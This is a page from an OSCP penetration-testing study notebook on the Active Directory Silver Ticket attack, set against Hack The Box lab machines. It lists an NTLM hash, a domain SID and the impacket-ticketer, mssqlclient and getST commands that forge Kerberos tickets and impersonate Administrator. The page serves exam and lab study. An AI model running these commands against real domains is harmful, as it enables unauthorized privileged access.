OSCP
Linkedin
  • 🐉README - Preperation
  • Proof
  • Services
    • Inital Scans
    • LDAP <tcp 389, 636>
    • DNS <udp 53>
    • FTP <tcp 21>
    • SMB <tcp 445, 139>
    • SNMP <udp 161>
    • MySQL<tcp 3306>
    • MSSQL <tcp 1433>
    • SMTP <tcp 25>
    • POP3 <tcp 110>
    • IMAP <tcp 143>
    • IDENT <tcp 113>
    • WEBDAV
    • SSH <tcp 22>
    • Port Knocking
    • Web Sockets
    • Misc
      • PWNCAT
      • WordPress
      • Keepass
      • Git
      • Site Scraping
  • Web Applications
    • Checklist
    • SQL Injection
      • MySQL Cheatsheet
      • MSSQL Cheatsheet
      • Postgres Cheatsheet
      • Payloads
      • SQLMap
      • Page
    • File Upload
    • Directory Traversal
    • LFI & RFI
      • PHP Wrappers
    • SSRF
    • Command injection
    • XXS
    • APIs
    • PHP Applications
    • Source Code
    • Brute Forcing and Spraying
    • Payloads
    • Compiling Exploits
    • Foothold
    • Node.js
    • Misc
  • Active Directory
    • Checklist
    • Initial Attack Strategy
      • LLMNR Poisoning
      • SMB Relay
      • Shell Acess
      • IPv6 Attacks
      • Kerbrute
      • AS-REP Roasting
      • RPC
      • Passback Attack
      • Misc
    • Post-Compromise Enumeration
      • ldapsearch
      • Ldapdomaindump
      • Bloodhound
        • Attack Paths
      • Plumhound
    • Lateral Movement
      • DCOM
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • LOTL WMI and WinRM
    • Post-Compromise Attacks
      • Kerberoasting
      • Silver Ticket
      • noPac or noCap ?
      • RPC Password Change
      • Mimikatz
      • Knock and Pass Kerberos
      • Dumping and Cracking Hashes
      • Token Impersonation
      • LNK File Attacks
      • GPP / cPassword Attacks
      • AD CS Attacks
      • misc
    • Post-Domain Compromise
      • Dumping the NTDS.dit
      • Golden Ticket Attack
      • Shadow Copies
      • SAM Cleanup
    • Critical Active Directory CVE's
      • Zerologon
      • PrintNightmare
  • Windows Privilege Escalation
    • Checklist
    • Initial Enumeration Manual
      • System Enumeration
      • User Enumeration
      • Network Enumeration
      • Password Hunting
      • AV and Firewall Enumeration
    • Initial Enumeration Automated
      • Methodology > Tools
    • Kernel Exploits
    • DLL Hijacking
    • Service Permissions
      • Binary Paths
      • Unquoted Service Paths
    • Impersonation and Potato Attacks
    • Registy
      • AutoRuns
      • AlwaysInstallElevated
      • Regsvc ACL
    • whoami /priv
      • SeManageVolumePrivilege
      • SeBackupPrivilege
      • SeRestorePrivilege
    • Scheduled tasks
    • xampp
    • Stored Passwords and Port Forwarding
    • RunAs
    • User Switching
    • Executable Files
    • Startup Applications
    • getsystem
    • Windows Subsystem for Linux
    • CVE-2019-1388
    • CVE-2024-26229 (new)
  • Linux Privilege Escalation
    • Checklist
    • Initial Enumeration
      • System Enumeration
      • User Enumeration
      • Network Enumeration
      • Password Hunting
    • Automated tools
    • Kernel Exploits
    • Passwords & File Permissions
      • Passwords
      • Weak File Permissions
      • SSH Keys
    • Sudo
      • Shell Escaping
      • Intended Functionality
      • LD_PRELOAD
      • Simple CTF
      • CVE-2019-14287 (sudo -u#-1 /bin/bash)
      • CVE-2019-18634 (pwfeedback)
    • SUID
      • Vulnversity
    • Capabilities
    • Cron jobs
    • /etc/passwd override
    • NFS Root Squashing
    • Docker
    • Path Variables
    • Groups
      • Disk
      • LXD/LXC
      • mlocate
    • Nginx
    • Misc
      • Wild Cards
      • Abusing scripts
      • Restricted shell escaping
      • Library Hijacking
      • PHP Web Applications
      • FreeBSD
  • Post Exploitation
    • C2
    • AV Evasion
      • Bypassing AMSI
      • Bypassing UAC
      • Disabling Windows Defender
      • Executable Obfuscation
      • Compiling Code
    • Exfiltration
      • Windows - Pickle
      • Mimikatz
    • Pivoting
      • Eumeration
      • Chisel
      • SSHuttle
      • Double Pivot
      • Good to Know
        • Tunneling
        • Plink.exe
        • Port Forwarding via ~C
        • Socat
        • Metasploit
    • File Transfers
    • DNS Tunneling
    • Persistence
    • PGP/ASC
    • Putty
    • Cleanup
  • Cool!
    • Client-side Attacks
      • Code execution via Windows Library
      • Evil Icon
      • ODT Files
    • Custom Wordlists
    • Fixing Exploits
    • Decrypting Secure Strings
    • tmux
    • Random
  • Report Writing
    • Findings Report
    • Common Legal Documents
Powered by GitBook
On this page
  1. Active Directory
  2. Post-Compromise Attacks

Silver Ticket

PreviousKerberoastingNextnoPac or noCap ?

Last updated 8 months ago

The username and password of the service account is needed for this attack

Create a NTLM hash of the password

1443EC19DA4DAC4FFC953BCA1B57B4CF

Next you need the Domains SID

*Evil-WinRM* PS C:\SQLSERVER\Logs> Get-ADDomain
S-1-5-21-4078382237-1492182817-2568127209

Create the ticket and connect with to mssql

impacket-ticketer -nthash <hash> -domain-sid <SID> -domain sequel.htb -spn Adot8/dc.sequel.htb administrator
KRB5CCNAME=administrator.ccache impacket-mssqlclient -k administrator@dc.sequel.htb

OR

impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$:pass -dc-ip 192.168.193.40

LogoNTLM HASH Generatorcodebeautify
LogoFoothold | Hack The Box